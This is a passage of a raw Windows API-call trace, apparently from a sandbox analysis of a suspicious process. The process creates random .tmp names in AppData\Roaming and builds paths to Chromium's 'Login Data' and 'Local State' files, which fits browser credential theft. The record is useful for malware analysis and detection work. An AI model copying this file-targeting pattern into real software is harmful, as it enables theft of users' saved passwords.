(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.368] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.368] lstrlenW (lpString="\\") returned 1 [0203.368] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.368] lstrlenW (lpString="\\") returned 1 [0203.368] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.368] lstrlenW (lpString="\\") returned 1 [0203.368] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.368] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.369] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.369] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.369] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.369] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.369] GetProcessHeap () returned 0x900000 [0203.369] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.369] lstrlenA (lpString="iCjasIn") returned 7 [0203.369] lstrlenA (lpString="iCjasIn") returned 7 [0203.369] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.370] lstrcpyA (in: lpString1=0x2d80000, lpString2="iCjasIn" | out: lpString1="iCjasIn") returned="iCjasIn" [0203.370] lstrlenA (lpString="iCjasIn") returned 7 [0203.370] lstrlenA (lpString="iCjasIn") returned 7 [0203.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.370] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.370] lstrlenA (lpString="iCjasIn") returned 7 [0203.370] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="iCjasIn") returned 8 [0203.370] lstrlenW (lpString="iCjasIn") returned 7 [0203.370] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.370] lstrlenW (lpString="iCjasIn") returned 7 [0203.370] lstrcpyW (in: lpString1=0x2df0000, lpString2="iCjasIn" | out: lpString1="iCjasIn") returned="iCjasIn" [0203.370] lstrlenW (lpString="iCjasIn") returned 7 [0203.370] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.371] lstrcpyW (in: lpString1=0x2e20000, lpString2="iCjasIn" | out: lpString1="iCjasIn") returned="iCjasIn" [0203.371] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.371] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.371] lstrlenW (lpString="iCjasIn") returned 7 [0203.371] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.371] lstrcatW (in: lpString1="", lpString2="iCjasIn" | out: lpString1="iCjasIn") returned="iCjasIn" [0203.371] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.372] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.372] GetProcessHeap () returned 0x900000 [0203.372] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.372] lstrlenW (lpString="iCjasIn") returned 7 [0203.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.372] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.372] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.372] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="iCjasIn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn" [0203.372] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.373] lstrlenW (lpString=".tmp") returned 4 [0203.373] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.373] lstrlenW (lpString=".tmp") returned 4 [0203.373] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.373] lstrlenW (lpString=".tmp") returned 4 [0203.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn") returned 53 [0203.373] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.373] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.373] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iCjasIn.tmp" [0203.374] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.374] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.374] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.374] lstrlenW (lpString="\\") returned 1 [0203.374] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.374] lstrlenW (lpString="\\") returned 1 [0203.374] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.375] lstrlenW (lpString="\\") returned 1 [0203.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.375] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.375] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.375] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.375] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.375] GetProcessHeap () returned 0x900000 [0203.375] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.375] lstrlenA (lpString="yqseiG.") returned 7 [0203.375] lstrlenA (lpString="yqseiG.") returned 7 [0203.375] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.376] lstrcpyA (in: lpString1=0x2d80000, lpString2="yqseiG." | out: lpString1="yqseiG.") returned="yqseiG." [0203.376] lstrlenA (lpString="yqseiG.") returned 7 [0203.376] lstrlenA (lpString="yqseiG.") returned 7 [0203.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.376] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.376] lstrlenA (lpString="yqseiG.") returned 7 [0203.376] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="yqseiG.") returned 8 [0203.376] lstrlenW (lpString="yqseiG.") returned 7 [0203.376] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.376] lstrlenW (lpString="yqseiG.") returned 7 [0203.376] lstrcpyW (in: lpString1=0x2e20000, lpString2="yqseiG." | out: lpString1="yqseiG.") returned="yqseiG." [0203.376] lstrlenW (lpString="yqseiG.") returned 7 [0203.376] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.377] lstrcpyW (in: lpString1=0x2eb0000, lpString2="yqseiG." | out: lpString1="yqseiG.") returned="yqseiG." [0203.377] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.377] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.377] lstrlenW (lpString="yqseiG.") returned 7 [0203.377] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.377] lstrcatW (in: lpString1="", lpString2="yqseiG." | out: lpString1="yqseiG.") returned="yqseiG." [0203.377] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.378] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.378] GetProcessHeap () returned 0x900000 [0203.378] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.378] lstrlenW (lpString="yqseiG.") returned 7 [0203.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.378] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.378] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.378] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="yqseiG." | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG.") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG." [0203.379] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.379] lstrlenW (lpString=".tmp") returned 4 [0203.379] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.379] lstrlenW (lpString=".tmp") returned 4 [0203.379] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.379] lstrlenW (lpString=".tmp") returned 4 [0203.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG.") returned 53 [0203.379] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.379] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.379] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG.", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG..tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yqseiG..tmp" [0203.380] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.380] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.380] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.380] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.380] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.381] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.381] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.381] lstrlenW (lpString="\\Chromium\\User Data\\Default\\Login Data") returned 38 [0203.381] VirtualAlloc (lpAddress=0x0, dwSize=0x4e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.381] lstrlenW (lpString="\\Chromium\\User Data\\Default\\Login Data") returned 38 [0203.381] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Chromium\\User Data\\Default\\Login Data" | out: lpString1="\\Chromium\\User Data\\Default\\Login Data") returned="\\Chromium\\User Data\\Default\\Login Data" [0203.381] lstrlenW (lpString="\\Chromium\\User Data\\Default\\Login Data") returned 38 [0203.381] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.381] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.381] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.381] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.382] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Chromium\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data" [0203.382] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.382] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.382] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.382] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.382] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.383] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.383] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.383] lstrlenW (lpString="\\Chromium\\User Data\\Local State") returned 31 [0203.383] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.383] lstrlenW (lpString="\\Chromium\\User Data\\Local State") returned 31 [0203.383] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Chromium\\User Data\\Local State" | out: lpString1="\\Chromium\\User Data\\Local State") returned="\\Chromium\\User Data\\Local State" [0203.383] lstrlenW (lpString="\\Chromium\\User Data\\Local State") returned 31 [0203.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.383] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.383] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.383] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.384] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Chromium\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\User Data\\Local State" [0203.384] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.384] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0203.384] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.384] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.385] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.385] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.385] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.385] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.385] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.385] lstrlenW (lpString="\\") returned 1 [0203.385] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.386] lstrlenW (lpString="\\") returned 1 [0203.386] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.386] lstrlenW (lpString="\\") returned 1 [0203.386] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.386] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.386] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.386] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.386] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.386] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.387] GetProcessHeap () returned 0x900000 [0203.387] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.387] lstrlenA (lpString="tbvcwor") returned 7 [0203.387] lstrlenA (lpString="tbvcwor") returned 7 [0203.387] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.387] lstrcpyA (in: lpString1=0x2d80000, lpString2="tbvcwor" | out: lpString1="tbvcwor") returned="tbvcwor" [0203.387] lstrlenA (lpString="tbvcwor") returned 7 [0203.387] lstrlenA (lpString="tbvcwor") returned 7 [0203.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.387] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.387] lstrlenA (lpString="tbvcwor") returned 7 [0203.387] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="tbvcwor") returned 8 [0203.387] lstrlenW (lpString="tbvcwor") returned 7 [0203.387] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.388] lstrlenW (lpString="tbvcwor") returned 7 [0203.388] lstrcpyW (in: lpString1=0x2df0000, lpString2="tbvcwor" | out: lpString1="tbvcwor") returned="tbvcwor" [0203.388] lstrlenW (lpString="tbvcwor") returned 7 [0203.388] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.388] lstrcpyW (in: lpString1=0x2e20000, lpString2="tbvcwor" | out: lpString1="tbvcwor") returned="tbvcwor" [0203.388] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.388] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.389] lstrlenW (lpString="tbvcwor") returned 7 [0203.389] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.389] lstrcatW (in: lpString1="", lpString2="tbvcwor" | out: lpString1="tbvcwor") returned="tbvcwor" [0203.389] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.389] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.389] GetProcessHeap () returned 0x900000 [0203.389] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.389] lstrlenW (lpString="tbvcwor") returned 7 [0203.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.389] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.389] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.390] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.390] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="tbvcwor" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor" [0203.390] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.390] lstrlenW (lpString=".tmp") returned 4 [0203.390] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.390] lstrlenW (lpString=".tmp") returned 4 [0203.390] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.390] lstrlenW (lpString=".tmp") returned 4 [0203.391] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor") returned 53 [0203.391] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.391] VirtualAlloc (lpAddress=0x0, 